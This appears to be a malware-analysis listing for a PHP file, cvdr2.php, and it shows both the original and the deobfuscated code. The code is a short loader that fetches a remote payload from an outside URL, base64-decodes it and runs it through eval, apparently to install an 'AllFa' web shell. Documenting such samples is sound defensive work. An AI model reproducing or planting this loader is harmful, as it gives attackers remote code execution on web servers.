PHP Malware Analysis

Filename: cvdr2.php

Tags

• base64_decode

• https://cavdar59.github.io/alfa

• eval

• file_get_contents

Deobfuscated code

<?php

$r3d = "https://cavdar59.github.io/alfa";
$l3nin = file_get_contents($r3d);
eval("?>" . base64_decode($l3nin));
?>
<!DOCTYPE html>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<div style="display: none;">
<h1>AllFa</h1>
</html>

Original code

<?php
$r3d = "https://cavdar59.github.io/alfa";
$l3nin = file_get_contents($r3d); 
eval("?>".(base64_decode($l3nin)));
?>
<!DOCTYPE html>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<div style="display: none;">
<h1>AllFa</h1>
</html>